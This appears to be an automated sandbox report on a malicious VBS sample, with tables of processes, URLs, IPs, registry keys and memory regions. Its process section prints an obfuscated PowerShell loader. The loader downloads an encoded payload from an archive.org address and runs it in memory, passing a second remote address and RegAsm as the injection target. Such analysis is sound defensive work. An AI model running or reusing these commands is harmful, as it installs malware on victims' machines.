Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
kz1fEn2R9Z.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afqypkfk.t2c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw3zflkn.xpi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kskqlwo2.umr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mot0inmo.pxr.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content
'+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content
= '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y =
[Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od
= gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA
, CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$')
| . ( $eNV:COmspEc[4,26,25]-jOiN'')"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://104.168.32.148/345/CHPPZA.txt
|
104.168.32.148
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.arXz
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://104.168.32.148
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.168.32.148
|
unknown
|
United States
|
||
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1A636EF0000
|
trusted library section
|
page read and write
|
|
|
|
1A62EDFE000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1B6F1427000
|
heap
|
page execute and read and write
|
||
|
1B6F1420000
|
heap
|
page execute and read and write
|
||
|
7FFD9B63D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6804F4000
|
trusted library allocation
|
page read and write
|
||
|
2031CFF000
|
stack
|
page read and write
|
||
|
1248A6F1000
|
heap
|
page read and write
|
||
|
1A61E429000
|
heap
|
page read and write
|
||
|
1248899F000
|
heap
|
page read and write
|
||
|
1B6F1369000
|
heap
|
page read and write
|
||
|
1248A892000
|
heap
|
page read and write
|
||
|
1A61E391000
|
heap
|
page read and write
|
||
|
1248A6FE000
|
heap
|
page read and write
|
||
|
1B680106000
|
trusted library allocation
|
page read and write
|
||
|
1A6369C0000
|
heap
|
page read and write
|
||
|
1A61CAD0000
|
trusted library allocation
|
page read and write
|
||
|
1B6F138D000
|
heap
|
page read and write
|
||
|
124889C6000
|
heap
|
page read and write
|
||
|
1A61C9AE000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
1248A770000
|
heap
|
page read and write
|
||
|
1A61EBC6000
|
trusted library allocation
|
page read and write
|
||
|
1248A891000
|
heap
|
page read and write
|
||
|
124889B5000
|
heap
|
page read and write
|
||
|
7FFD9B622000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF210000
|
heap
|
page read and write
|
||
|
46764FE000
|
stack
|
page read and write
|
||
|
1A636B65000
|
heap
|
page read and write
|
||
|
124889C6000
|
heap
|
page read and write
|
||
|
1A62E7F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1248A7F1000
|
heap
|
page read and write
|
||
|
1A636AD0000
|
heap
|
page execute and read and write
|
||
|
8853E3E000
|
stack
|
page read and write
|
||
|
1B690074000
|
trusted library allocation
|
page read and write
|
||
|
1A61CAB0000
|
trusted library allocation
|
page read and write
|
||
|
885397E000
|
stack
|
page read and write
|
||
|
1A61E496000
|
heap
|
page read and write
|
||
|
1248A97D000
|
heap
|
page read and write
|
||
|
1B6F136E000
|
heap
|
page read and write
|
||
|
1248A790000
|
heap
|
page read and write
|
||
|
124889A4000
|
heap
|
page read and write
|
||
|
1B6F1383000
|
heap
|
page read and write
|
||
|
1248A77C000
|
heap
|
page read and write
|
||
|
1B68010C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1248A736000
|
heap
|
page read and write
|
||
|
12488C09000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A7B0000
|
heap
|
page read and write
|
||
|
4676A3E000
|
stack
|
page read and write
|
||
|
1A62E7E1000
|
trusted library allocation
|
page read and write
|
||
|
1A61E370000
|
heap
|
page read and write
|
||
|
7FFD9B7E4000
|
trusted library allocation
|
page read and write
|
||
|
885403B000
|
stack
|
page read and write
|
||
|
1248892B000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A74E000
|
heap
|
page read and write
|
||
|
124889A0000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page execute and read and write
|
||
|
467667E000
|
stack
|
page read and write
|
||
|
1B680120000
|
trusted library allocation
|
page read and write
|
||
|
1248A73E000
|
heap
|
page read and write
|
||
|
1A6200FA000
|
trusted library allocation
|
page read and write
|
||
|
1248A71A000
|
heap
|
page read and write
|
||
|
7FFD9B740000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1248892F000
|
heap
|
page read and write
|
||
|
7FFD9B62D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A636BB1000
|
heap
|
page read and write
|
||
|
7FFD9B640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
885387E000
|
stack
|
page read and write
|
||
|
8853B7F000
|
stack
|
page read and write
|
||
|
46769BE000
|
stack
|
page read and write
|
||
|
1A61C9B8000
|
heap
|
page read and write
|
||
|
1248A725000
|
heap
|
page read and write
|
||
|
46761CF000
|
stack
|
page read and write
|
||
|
46767BF000
|
stack
|
page read and write
|
||
|
1A61C970000
|
heap
|
page read and write
|
||
|
1A61EC0A000
|
trusted library allocation
|
page read and write
|
||
|
1B68011D000
|
trusted library allocation
|
page read and write
|
||
|
1B6F12A0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
1248A777000
|
heap
|
page read and write
|
||
|
1248A7A0000
|
heap
|
page read and write
|
||
|
12488C0D000
|
heap
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
|
124889D6000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
20323FB000
|
stack
|
page read and write
|
||
|
1A62E855000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF339000
|
heap
|
page read and write
|
||
|
1A61FEDE000
|
trusted library allocation
|
page read and write
|
||
|
12488C0B000
|
heap
|
page read and write
|
||
|
1A6204CC000
|
trusted library allocation
|
page read and write
|
||
|
1A61EBE3000
|
trusted library allocation
|
page read and write
|
||
|
1A61C9FA000
|
heap
|
page read and write
|
||
|
1B6EF586000
|
heap
|
page read and write
|
||
|
1A61E3C6000
|
heap
|
page read and write
|
||
|
4676143000
|
stack
|
page read and write
|
||
|
1A62EAD0000
|
trusted library allocation
|
page read and write
|
||
|
88539FC000
|
stack
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1B6F1376000
|
heap
|
page read and write
|
||
|
7FFD9B623000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A61CB50000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A76B000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1248A731000
|
heap
|
page read and write
|
||
|
1B6805FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B633000
|
trusted library allocation
|
page execute and read and write
|
||
|
124889C6000
|
heap
|
page read and write
|
||
|
1B6F13B0000
|
heap
|
page execute and read and write
|
||
|
1248A7F0000
|
heap
|
page read and write
|
||
|
1B6804CB000
|
trusted library allocation
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1A636AF0000
|
heap
|
page read and write
|
||
|
124889A8000
|
heap
|
page read and write
|
||
|
12488C00000
|
heap
|
page read and write
|
||
|
1B68011A000
|
trusted library allocation
|
page read and write
|
||
|
1A61E43F000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1B6F1346000
|
heap
|
page read and write
|
||
|
1248897E000
|
heap
|
page read and write
|
||
|
1A620270000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A1000
|
trusted library allocation
|
page read and write
|
||
|
1B680109000
|
trusted library allocation
|
page read and write
|
||
|
1B680050000
|
trusted library allocation
|
page read and write
|
||
|
12488993000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1248A706000
|
heap
|
page read and write
|
||
|
1248A901000
|
heap
|
page read and write
|
||
|
1A6204C7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A76A000
|
heap
|
page read and write
|
||
|
1A636B6B000
|
heap
|
page read and write
|
||
|
1A636B32000
|
heap
|
page read and write
|
||
|
1B6F13AE000
|
heap
|
page read and write
|
||
|
1B68015A000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF2B8000
|
heap
|
page read and write
|
||
|
1A61CA90000
|
trusted library allocation
|
page read and write
|
||
|
8853BF9000
|
stack
|
page read and write
|
||
|
1248A75B000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
1248A722000
|
heap
|
page read and write
|
||
|
1A62F7FE000
|
trusted library allocation
|
page read and write
|
||
|
1A61EDF1000
|
trusted library allocation
|
page read and write
|
||
|
88535C3000
|
stack
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6E6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B802000
|
trusted library allocation
|
page read and write
|
||
|
1A636AF8000
|
heap
|
page read and write
|
||
|
7FFD9B706000
|
trusted library allocation
|
page execute and read and write
|
||
|
12488C0A000
|
heap
|
page read and write
|
||
|
1B68001B000
|
trusted library allocation
|
page read and write
|
||
|
1B680053000
|
trusted library allocation
|
page read and write
|
||
|
1248A900000
|
heap
|
page read and write
|
||
|
7FFD9B7D2000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF270000
|
heap
|
page read and write
|
||
|
1A61CAF0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
1248A706000
|
heap
|
page read and write
|
||
|
1B6EF2F2000
|
heap
|
page read and write
|
||
|
1B68009D000
|
trusted library allocation
|
page read and write
|
||
|
8853DB8000
|
stack
|
page read and write
|
||
|
1A61C9B0000
|
heap
|
page read and write
|
||
|
1248A767000
|
heap
|
page read and write
|
||
|
1248A7A8000
|
heap
|
page read and write
|
||
|
1B6EF480000
|
trusted library allocation
|
page read and write
|
||
|
1B6F12F9000
|
heap
|
page read and write
|
||
|
1B6EF500000
|
heap
|
page read and write
|
||
|
1B6EF2B0000
|
heap
|
page read and write
|
||
|
20319FE000
|
stack
|
page read and write
|
||
|
1A61C810000
|
heap
|
page read and write
|
||
|
2031DFE000
|
stack
|
page read and write
|
||
|
1A636AC7000
|
heap
|
page execute and read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1A620402000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1248A72A000
|
heap
|
page read and write
|
||
|
1A6367E6000
|
heap
|
page read and write
|
||
|
4676779000
|
stack
|
page read and write
|
||
|
1B6EF4A0000
|
trusted library allocation
|
page read and write
|
||
|
1248892A000
|
heap
|
page read and write
|
||
|
124889B4000
|
heap
|
page read and write
|
||
|
1248A78B000
|
heap
|
page read and write
|
||
|
1248893F000
|
heap
|
page read and write
|
||
|
7FFD9B716000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A70A000
|
heap
|
page read and write
|
||
|
1A61C9F7000
|
heap
|
page read and write
|
||
|
1B6EF33D000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1A61E490000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1A636BAD000
|
heap
|
page read and write
|
||
|
1248A71D000
|
heap
|
page read and write
|
||
|
7FFD9B632000
|
trusted library allocation
|
page read and write
|
||
|
467647F000
|
stack
|
page read and write
|
||
|
7FFD9B640000
|
trusted library allocation
|
page read and write
|
||
|
1248A6FD000
|
heap
|
page read and write
|
||
|
1A61FEB5000
|
trusted library allocation
|
page read and write
|
||
|
1A61FEBA000
|
trusted library allocation
|
page read and write
|
||
|
1B690010000
|
trusted library allocation
|
page read and write
|
||
|
1248A97E000
|
heap
|
page read and write
|
||
|
1B680123000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B624000
|
trusted library allocation
|
page read and write
|
||
|
1B680023000
|
trusted library allocation
|
page read and write
|
||
|
1A61E300000
|
trusted library allocation
|
page read and write
|
||
|
1A620181000
|
trusted library allocation
|
page read and write
|
||
|
12488870000
|
heap
|
page read and write
|
||
|
46768B9000
|
stack
|
page read and write
|
||
|
124889E4000
|
heap
|
page read and write
|
||
|
7FFD9B7E1000
|
trusted library allocation
|
page read and write
|
||
|
1248A7AF000
|
heap
|
page read and write
|
||
|
1B6EF4C0000
|
trusted library allocation
|
page read and write
|
||
|
1248A711000
|
heap
|
page read and write
|
||
|
7DF474D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
124889E4000
|
heap
|
page read and write
|
||
|
12488860000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A705000
|
heap
|
page read and write
|
||
|
1A61CB5E000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1B6EF310000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A702000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF337000
|
heap
|
page read and write
|
||
|
20322FF000
|
stack
|
page read and write
|
||
|
7FFD9B6D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1B680001000
|
trusted library allocation
|
page read and write
|
||
|
1B680312000
|
trusted library allocation
|
page read and write
|
||
|
1248A788000
|
heap
|
page read and write
|
||
|
1A61EF40000
|
trusted library allocation
|
page read and write
|
||
|
46765FF000
|
stack
|
page read and write
|
||
|
12488C0E000
|
heap
|
page read and write
|
||
|
124889C6000
|
heap
|
page read and write
|
||
|
1248A7B0000
|
heap
|
page read and write
|
||
|
7FFD9B7D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B634000
|
trusted library allocation
|
page read and write
|
||
|
1A61C979000
|
heap
|
page read and write
|
||
|
1A61EC06000
|
trusted library allocation
|
page read and write
|
||
|
1A61C950000
|
heap
|
page read and write
|
||
|
12488890000
|
heap
|
page read and write
|
||
|
1A61E470000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
1A61EBD1000
|
trusted library allocation
|
page read and write
|
||
|
88538FE000
|
stack
|
page read and write
|
||
|
1248A739000
|
heap
|
page read and write
|
||
|
1A61E330000
|
trusted library allocation
|
page read and write
|
||
|
1248898D000
|
heap
|
page read and write
|
||
|
1A61C910000
|
heap
|
page read and write
|
||
|
1A61CAC0000
|
heap
|
page readonly
|
||
|
1248898A000
|
heap
|
page read and write
|
||
|
1248899D000
|
heap
|
page read and write
|
||
|
7FFD9B630000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF3A7000
|
heap
|
page read and write
|
||
|
1248A6F0000
|
heap
|
page read and write
|
||
|
1248898B000
|
heap
|
page read and write
|
||
|
8853EBE000
|
stack
|
page read and write
|
||
|
1248A891000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
467657D000
|
stack
|
page read and write
|
||
|
1A61FEDA000
|
trusted library allocation
|
page read and write
|
||
|
1A636AC0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9B9000
|
trusted library allocation
|
page read and write
|
||
|
1A636AF4000
|
heap
|
page read and write
|
||
|
2031AFE000
|
stack
|
page read and write
|
||
|
4676837000
|
stack
|
page read and write
|
||
|
1B690001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF5D0000
|
heap
|
page read and write
|
||
|
1A61E45D000
|
heap
|
page read and write
|
||
|
1B680161000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1A61EE22000
|
trusted library allocation
|
page read and write
|
||
|
124889E4000
|
heap
|
page read and write
|
||
|
20321FF000
|
stack
|
page read and write
|
||
|
1248A7B0000
|
heap
|
page read and write
|
||
|
1A636B37000
|
heap
|
page read and write
|
||
|
4676BBB000
|
stack
|
page read and write
|
||
|
12488900000
|
heap
|
page read and write
|
||
|
1A61CB55000
|
heap
|
page read and write
|
||
|
1A620126000
|
trusted library allocation
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1248A716000
|
heap
|
page read and write
|
||
|
8853D3B000
|
stack
|
page read and write
|
||
|
12488C05000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
124889A6000
|
heap
|
page read and write
|
||
|
1248A6F4000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
20320FE000
|
stack
|
page read and write
|
||
|
1B6F1450000
|
heap
|
page read and write
|
||
|
1A61FECD000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF580000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF230000
|
heap
|
page read and write
|
||
|
124889A9000
|
heap
|
page read and write
|
||
|
1A61EBDF000
|
trusted library allocation
|
page read and write
|
||
|
1248A75E000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1248898C000
|
heap
|
page read and write
|
||
|
1A62EADE000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF2F0000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
1A61E861000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF200000
|
heap
|
page read and write
|
||
|
1B6F12B0000
|
heap
|
page read and write
|
||
|
1B6EF5D5000
|
heap
|
page read and write
|
||
|
1B6EF2F8000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
1248A71D000
|
heap
|
page read and write
|
||
|
7FFD9B9C3000
|
trusted library allocation
|
page read and write
|
||
|
124889D5000
|
heap
|
page read and write
|
||
|
1A61C9F5000
|
heap
|
page read and write
|
||
|
7FFD9B64C000
|
trusted library allocation
|
page read and write
|
||
|
1248A79F000
|
heap
|
page read and write
|
||
|
124888E0000
|
heap
|
page read and write
|
||
|
1B6EF3A4000
|
heap
|
page read and write
|
||
|
8853A7E000
|
stack
|
page read and write
|
||
|
467758E000
|
stack
|
page read and write
|
||
|
1B6F1400000
|
heap
|
page read and write
|
||
|
1B6EF2FE000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1248A82F000
|
heap
|
page read and write
|
||
|
124889E4000
|
heap
|
page read and write
|
||
|
1248A7AE000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A730000
|
heap
|
page read and write
|
||
|
1248A7AF000
|
heap
|
page read and write
|
||
|
1B6F1530000
|
heap
|
page read and write
|
||
|
1B6EF2C3000
|
heap
|
page read and write
|
||
|
1A61EA04000
|
trusted library allocation
|
page read and write
|
||
|
8853CB7000
|
stack
|
page read and write
|
||
|
7FFD9B7DA000
|
trusted library allocation
|
page read and write
|
||
|
1A61EDE6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
12488C08000
|
heap
|
page read and write
|
||
|
7FFD9B7EA000
|
trusted library allocation
|
page read and write
|
||
|
1B68006D000
|
trusted library allocation
|
page read and write
|
||
|
1A61CA43000
|
heap
|
page read and write
|
||
|
7FFD9B620000
|
trusted library allocation
|
page read and write
|
||
|
1B6804A4000
|
trusted library allocation
|
page read and write
|
||
|
1248A74B000
|
heap
|
page read and write
|
||
|
1A636EE0000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
467693E000
|
